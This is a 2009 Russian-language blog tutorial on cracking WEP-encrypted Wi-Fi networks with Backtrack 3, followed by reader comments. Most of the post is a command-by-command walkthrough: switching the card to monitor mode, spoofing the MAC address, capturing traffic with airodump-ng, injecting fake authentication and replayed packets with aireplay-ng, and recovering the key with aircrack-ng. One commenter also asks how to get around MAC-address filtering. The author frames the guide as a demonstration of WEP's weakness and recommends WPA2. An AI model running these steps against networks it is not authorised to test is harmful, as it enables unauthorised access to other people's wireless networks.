Linux и Windows: помощь админам и пользователям

Администрируем и настраиваем Windows, Linux.



Взламываем WEP, используя Backtrack 3

Рубрика: Разное
Метки: | |
Понедельник, 2 марта 2009 г.
Просмотров: 12153
Подписаться на комментарии по RSS

Я уже рассказывал в этом блоге про Backtrack, в данной же статье мы рассмотрим одно из важнейших его применений. То, о чем я буду рассказывать в данной статье, я уже публиковал, но в виде роликов с ютуба. В данной же статье я объясню все более подробно. Не лишним будет заметить, что данное пособие предназначено для тестовых целей, и не ставит своей целью взращивание хацкеров. В данной статье будет объяснено каким образом можно взломать 64bit и 128bit WEP шифрование на различных WIFI роутерах используя Backtrack, live-дистрибутив Linux. Я выполнял описанные действия на ноутбуках IBM Thinkpad x60, Acer 5672 и  WIFI чипсет в этих машинах работал отлично.

 

Требования:

 

  • Backtrack 3 на CD или USB
  • Компьютер с поддерживаемой беспроводной картой 802.11
  • Wireless Access point или WIFI роутер, использующий WEP шифрование

Подготавливаем WIFI карту

Для начала мы должны перевести карту в режим “Monitor Mode”. Если вы используете чипчет Intel® PRO/Wireless 3945ABG выполните следующую команду:

modprobe -r iwl3945 modprobe ipwraw

Далее мы должны остановить нашу WIFI карту:

iwconfig

Посмотри под каким именем виден ваш беспроводной интерфейс, далее остановите его командой:

airmon-ng stop [device]

Затем:

ifconfig down [interface]

Изменяем MAC адрес устройства:

macchanger --mac 00:11:22:33:44:66 [device]

Запускаем карту:

airmon-ng start [device]

Начинаем атаку

Теперь пришло время найти подходящую сеть для атаки. Запускаем команду:

airodump-ng [device]

ищем сеть

Мы видим доступные сети, в частности MAC адрес (BSSID), канал (CH) и имя (ESSID). Теперь мы начнем собирать данные с WIFI роутера для атаки:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

собираем данные

Команда выше поместит полученные данные в файл network.out. Этот файл потребутеся нам позднее когда мы будем готовы взламывать WEP ключ.

Откройте другое окно шелла и оставьте предыдущую команду выполняться. Теперь же мы сгенерируем несколько поддельных пакетов к роутеру для ускорения сбора данных. Используйте следующую команду:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

поддельные пакеты

Если команда выше прошла успешно, мы будем генерировать большое количество пакетов на взламываемую сеть. Введите:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

генерируем пакеты

Это заставит точку доступа послать большое количество пакетов, которые мы сможем использовать для взлома WEP ключа. Проверьте ваш оставленный в первом окне шелла aerodump-ng. Вы должны увидеть там поле “data”, в котором уже довольно много пакетов.

проверяем

Когда значение этого поля достигает 10,000-20,000 вы можете начинать взлом ключа. Если нет других доступных сетей, можно попробовать команду:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

 

ломаем

 

Когда мы наберем достаточно пакетов, начинаем взлом:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

Параметр “-n 128″ указывает на 128-битный WEP ключ. Если взлом не получится, используйте  “-n 64″

взлом

Все, наш взлом завершился! Ключ найден и нам осталось только удалить из вывода символы :

Используйте данную технику для демонстрации слабости WEP шифрования. Я надеюсь вы сами используете WPA2 в ваших сетях.

Постовой

Оригинальные гаджеты и инновационные девайсы в блоге mobilexus.ru

Существуте ли ещё вообще такое понятие как патриотизм в России? Конечно да, существуют ещё люди для которых данные слова не пустой звук. Приходите на наш сайт, и убедитесь в этом.

]]>twitter.com Google Buzz google.com bobrdobr.ru del.icio.us technorati.com linkstore.ru news2.ru rumarkz.ru memori.ru moemesto.ru]]>

Еще записи по теме

Комментариев: 5

  1. 2009-11-28 в 03:44:20 | Artyom (анонимно)

    zdrastvuite. u menya problema s back track 3. kogda ya otkrivayu back track 3 i na4inayu vvodit komandu moi komputer imeet zavis i viklu4aetsya avtomati4eskiy. Ranwe takogo ne bylo, ya ne ponemayu v 4em problema. esli vy znaite v 4em problema, pojaluista daite mne znat. sposibo. moi e-mail: art_yom@mail.ru

  2. 2010-01-08 в 16:28:01 | Klon (анонимно)

    как прописать путь для сохранения файла network.out или как посмотреть куда он сохраняется. Я загружаю back track 3 c CD

  3. 2010-01-10 в 15:47:43 | Андрей (анонимно)

    Не обязательно Back track использовать можно любой из Linux`ов установив нужные пакеты. А network.out сохраняется в ту папку в какой вы находитесь на момент выполнения команды переход в другую папку cd

  4. 2010-01-11 в 16:35:03 | Klon (анонимно)

    Спс, а как обойти фильтрацию по мак-адресам?

  5. 2010-02-19 в 03:43:07 | Savr (анонимно)

    Не подскажите какие пакеты нужно поставить в Mandiva Linux, а то не находит airplay-ng.

Оставьте комментарий!

Не регистрировать/аноним

Используйте нормальные имена.

Если вы уже зарегистрированы как комментатор или хотите зарегистрироваться, укажите пароль и свой действующий email.
(При регистрации на указанный адрес придет письмо с кодом активации и ссылкой на ваш персональный аккаунт, где вы сможете изменить свои данные, включая адрес сайта, ник, описание, контакты и т.д.)


(обязательно)